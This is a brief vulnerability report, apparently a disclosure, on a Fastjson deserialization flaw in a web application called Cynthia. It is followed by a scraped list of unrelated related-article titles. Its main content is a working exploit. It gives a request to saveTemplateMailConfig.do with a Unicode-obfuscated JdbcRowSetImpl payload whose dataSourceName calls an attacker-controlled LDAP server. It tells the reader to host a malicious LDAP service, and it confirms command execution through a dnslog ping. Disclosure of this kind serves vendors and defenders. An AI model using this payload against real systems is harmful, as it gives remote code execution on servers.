This is a Fastjson deserialization vulnerability

1.login fast
Login required

2.Fastjson deserialization
Trigger point
http://xx.xxx.xxx.xx/cynthia/template/saveTemplateMailConfig.do?templateId=744313&templateMailOptions={“b”:{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":“ldap://xx.xx.xx.xx:1389/wj0bb4”,“autoCommit”:true}}
Deploy malicious LDAP on the server ,then Request received
ping -c2 aa.lmy0c7.dnslog.cn The command is executed

Cynthia - Fastjson deserialization vulnerability相关推荐

  1. 深度对比Jackson和Fastjson,最终我还是选择了...

    点击关注公众号,Java干货及时送达 来源:cnblogs.com/larva-zhh/p/11544317.html 为什么要替换fastjson 框架选型 替换fastjson Deseriali ...

  2. weblogic修改banner_WeblogicScanV1.3

    WeblogicScan Weblogic一键漏洞检测工具,V1.3 软件作者:Tide_RabbitMask 免责声明:Pia!(o ‵-′)ノ"(ノ﹏ 本工具仅用于安全测试,请勿用于非法 ...

  3. Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)

    第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1.攻击Linux服务器 2.SQL注入攻击 3.shell类型 4.攻击Windows服务器 5.利用公用服务 6.MS17-010 永恒之蓝 ...

  4. Java RMI反序列化/JEP290相关

    RMI 远程过程调用 (Remote Procedure Call)是一种服务器-客户端模式, Java的RMI(Remote Method Invocation)是一种RPC实现. 其基本思想是程序 ...

  5. 红日安全内网渗透笔记

    靶场下载地址:漏洞详情 环境配置参考:[红日安全-VulnStack]ATT&CK实战系列--红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 .核心区的AD ...

  6. php cve 2017 12933,18-017 (March 27, 2018)

    描述 * indicates a new version of an existing rule Deep Packet Inspection Rules: DCERPC Services - Cli ...

  7. 10 个 Java 安全最佳实践

    Java 安全问题 尽管我们都致力于编写出色的代码,但 Java 安全性并不总是开发人员思维的一部分.但是,防止 Java 安全问题应该与使您的 Java 应用程序具有高性能.可扩展性和可维护性一样重 ...

  8. Cynthia - XSS vulnerability exists in the newly created TAG

    There is an XSS vulnerability when creating a new TAG 1. Click the settings icon and then click the ...

  9. FastJson屡爆漏洞,或许你应该试试它?

    点击蓝色"程序猿DD"关注我 回复"资源"获取独家整理的学习资料! 前言 这个周末被几个技术博主的同一篇公众号文章「预警」尽快升级FastJson版本,避免恶意 ...

最新文章

  1. 在Linux上限制远程登陆的IP
  2. 利用逻辑回归进行简单的人群分类解决广告推荐问题
  3. vsftp中配置默认目录
  4. 丢掉DDoS的八个幻想
  5. c语言判断字符是否等于e,C语言如何实现删除字符串中的字符
  6. eclipse中如何将中文乱码的class文件改为可读
  7. log4j平稳升级到log4j2
  8. 类型不匹配 java_java – 与泛型类型不匹配
  9. 网页嵌入暴风影音播放插件
  10. 树莓派制作语音对话机器人
  11. Android 如何反编译apk查看源码
  12. xshell无法显示汉字
  13. 华为云数据容灾服务,如何守护企业数据安全
  14. 云队友丨任正非内部演讲:星光不问赶路人
  15. Xlookup、Vlookup请走开,万能的Wlookup函数来了!
  16. 布尔(BOOL)代数及其运算
  17. 【js组件】仿照steam样式制造自定义横向纵向滚动条
  18. 【SpringBoot】:j2cache入门案例
  19. 解决客户 IE 浏览器“兼容性视图“设置带来的问题
  20. StringBuffer是安全的吗?

热门文章

  1. .NET开源开发项目
  2. Java学习-使用文本编辑器编辑Java源代码
  3. 【科创人】联软科技张建耀:不擅长营销的拓荒高手,企业长期发展必经管理变革
  4. 今日免费PNG图标集下载 - SweetiePlus
  5. 13、撤回(撤销)、驳回(退回)、作废(终止)、挂起(中止)
  6. 2021-2027全球与中国双面身份证打印机市场现状及未来发展趋势
  7. 解析程序化中的机器人的算法写作
  8. nuxt服务端渲染技术
  9. arbiter circuit(以Verilog FSM实现仲裁器)
  10. java excel 注解_Java中注解学习系列教程-5 excel导出优化初级阶段